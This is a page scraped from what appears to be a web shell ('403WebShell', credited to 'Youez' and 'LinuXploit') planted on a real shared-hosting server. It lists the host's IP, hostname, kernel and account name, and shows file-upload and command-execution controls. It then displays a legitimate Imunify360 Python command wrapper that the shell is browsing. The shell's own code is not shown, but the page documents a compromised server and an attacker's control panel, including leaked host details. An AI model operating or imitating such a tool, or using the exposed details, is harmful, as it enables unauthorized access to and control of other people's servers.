Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.222.161.57
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/imunify360/venv/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/imunify360/venv/bin/imunify360-command-wrapper
#!/opt/imunify360/venv/bin/python3

import base64
import subprocess
import json
import os
import time
import fileinput
import socket
import select
import shutil
import random
import string
import sys
from urllib.parse import urlencode

# this code is duplicated in installation.py because execute.py file is
# copied into /usr/bin directory in .spec. To handle it we can:
# 1. Create package in /opt/alt, but:
#     1.1 In plesk extension case python38 is installed after this code
# 2. Save code in var/etc directories and use symlinks technique, but:
#     2.1 Again, plesk extension
#     2.2 Symlinks may be disabled in the system
#         (so endusers will not be able to use extension)
#     2.3 This directories are not intended for such usage
#         (var is even deletable)
# 3. Store this files in new place in each extension
#     3.1 There are 4 extensions * 2 os types
# also present in installation.py


class Status:
    INSTALLING = "installing"
    UPGRADING = "upgrading"
    OK = "running"
    NOT_INSTALLED = "not_installed"
    FAILED_TO_INSTALL = "failed_to_install"
    STOPPED = "stopped"
    SOCKET_INACCESSIBLE = "socket_inaccessible"


class ImunifyPluginDeployScript:
    IMUNIFY_360 = "i360deploy.sh"
    IMUNIFY_AV = "imav-deploy.sh"


def get_status():
    if is_in_upgrade_process():
        return Status.UPGRADING

    proc = subprocess.Popen(["ps", "ax"], stdout=subprocess.PIPE)
    output = proc.stdout.read()
    is_i360_running = ImunifyPluginDeployScript.IMUNIFY_360.encode() in output
    is_imav_running = ImunifyPluginDeployScript.IMUNIFY_AV.encode() in output
    if is_i360_running or is_imav_running:
        return Status.INSTALLING
    else:
        sock = None
        try:
            sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            sock.connect("/var/run/defence360agent/simple_rpc.sock")
            return Status.OK
        except PermissionError:
            return Status.SOCKET_INACCESSIBLE
        except Exception:
            if os.path.exists("/usr/bin/imunify360-agent"):
                return Status.STOPPED
            else:
                try:
                    if os.path.exists(
                        "/usr/local/psa/var/modules/"
                        "imunify360/installation.log"
                    ):
                        return Status.FAILED_TO_INSTALL
                except:  # noqa
                    pass
                return Status.NOT_INSTALLED
        finally:
            if sock is not None:
                sock.close()


SOCKET_PATH_ROOT = "/var/run/defence360agent/simple_rpc.sock"
SOCKET_PATH_USER = "/var/run/defence360agent/non_root_simple_rpc.sock"
UPGRADE_MARKER_FILE = "/var/imunify360/upgrade_process_started"


class ExecuteError(Exception):
    def __str__(self):
        return "ExecuteError: " + super(ExecuteError, self).__str__()


def is_in_upgrade_process():
    return os.path.isfile(UPGRADE_MARKER_FILE)


def execute(command):
    if is_in_upgrade_process():
        handle_upgrading(command)
        return

    socket_path = SOCKET_PATH_ROOT if os.getegid() == 0 else SOCKET_PATH_USER

    try:
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
            sock.connect(socket_path)
            sock.sendall(str.encode(command) + b"\n")

            fd_list = [sock.fileno()]
            rwx_list = select.select(fd_list, [], [], 180)

            if sock.fileno() not in rwx_list[0]:
                raise Exception("Request timeout")

            response = sock.makefile(encoding="utf-8").readline()
            if not response:
                raise Exception("Empty response from socket")

            print(response)
    except (ConnectionRefusedError, FileNotFoundError, PermissionError):
        print_response()


def print_response(resp_data=None, resp_status=get_status(), result="error"):
    print(
        json.dumps(
            dict(
                result=result,
                messages=[],
                data=resp_data,
                status=resp_status,
            )
        )
    )


def _get_chunk(offset, limit):
    try:
        with open("/var/log/i360deploy.log", "r") as f:
            f.seek(offset)
            for i in range(10):
                chunk = f.read(limit)
                if chunk == "":
                    time.sleep(1)
                else:
                    return chunk
    except (IOError, OSError, ValueError):
        return "Error reading file i360deploy.log"
    return ""


def print_upgrading_status(offset, limit):
    chunk = _get_chunk(offset, limit)
    resp_data = dict(
        items=dict(
            log=chunk,
            offset=offset + len(chunk),
        )
    )
    print_response(
        resp_data,
        resp_status=Status.UPGRADING,
        result="success",
    )


def handle_upgrading(command):
    request = json.loads(command)

    if request.get("command") == ["upgrading", "status"]:
        params = request.get("params")
        print_upgrading_status(params["offset"], params["limit"])
    else:
        print_response(resp_status=get_status(), result="error")


def upload_file(params):
    params = json.loads(params)
    upload_path = "/var/imunify360/uploads"
    uploaded = []

    for tmp_path, file_name in params.get("files", {}).items():
        file_name = file_name.encode("utf-8")
        path = os.path.join(bytes(upload_path, "utf-8"), file_name)
        shutil.move(tmp_path.encode("utf-8"), path)
        os.chown(path, 0, 0)
        os.chmod(path, 0o600)
        uploaded.append(path)

    random_name = "".join(
        random.choice(string.ascii_uppercase + string.digits) for _ in range(8)
    )
    zip_file = random_name + ".zip"
    zip_path = os.path.join("/var/imunify360/uploads", zip_file)
    subprocess.call(
        ["zip", "-j", "-m", "--password", "1", zip_path] + uploaded,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.STDOUT,
        shell=False,
    )
    os.chown(zip_path, 0, 0)
    os.chmod(zip_path, 0o600)

    result = {
        "result": "success",
        "data": zip_path,
    }

    print(json.dumps(result))


#  Imunify Email

IMUNIFYEMAIL_SOCKET_PATH = "/var/run/imunifyemail/quarantine.sock"

if os.path.exists(IMUNIFYEMAIL_SOCKET_PATH):
    import urllib3.connection

    class HttpUdsConnection(urllib3.connection.HTTPConnection):
        def __init__(self, socket_path, *args, **kw):
            self.socket_path = socket_path
            super().__init__(*args, **kw)

        def connect(self):
            self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            self.sock.connect(self.socket_path)


def imunifyemail(command):
    command = json.loads(command)
    con = HttpUdsConnection(IMUNIFYEMAIL_SOCKET_PATH, "localhost")
    url = ("/quarantine/api/v1/" + "/".join(command["command"])).format(
        account_name=command["username"]
    )
    try:
        con.request(
            command["params"]["request_method"].upper(),
            url + "?" + urlencode(command["params"], doseq=True),
            body=json.dumps(command["params"]),
        )
    except Exception as e:
        print(
            json.dumps(
                {
                    "messages": str(e),
                    "result": "error",
                }
            )
        )
        return

    data = []
    response = con.getresponse()
    response_text = response.read()
    if response_text:
        response_text = json.loads(response_text) or []
        if "items" in response_text:
            data = response_text
        else:
            data = dict(items=response_text)

    messages = (
        "Something went wrong please try again"
        if response.status != 200
        else ""
    )

    print(
        json.dumps(
            dict(
                result="success" if response.status == 200 else "error",
                messages=messages,
                status=response.status,
                data=data,
            )
        )
    )


if __name__ == "__main__":
    action = sys.argv[1]
    encoded_data = fileinput.input(files=sys.argv[2:]).readline()
    data = base64.b64decode(encoded_data).decode()
    dispatcher = {
        "execute": execute,
        "uploadFile": upload_file,
        "imunifyEmail": imunifyemail,
    }

    try:
        dispatcher.get(action, execute)(data)
    except Exception as e:
        print(
            json.dumps(
                {
                    "messages": str(e),
                    "result": "error",
                }
            )
        )

Youez - 2016 - github.com/yon3zu
LinuXploit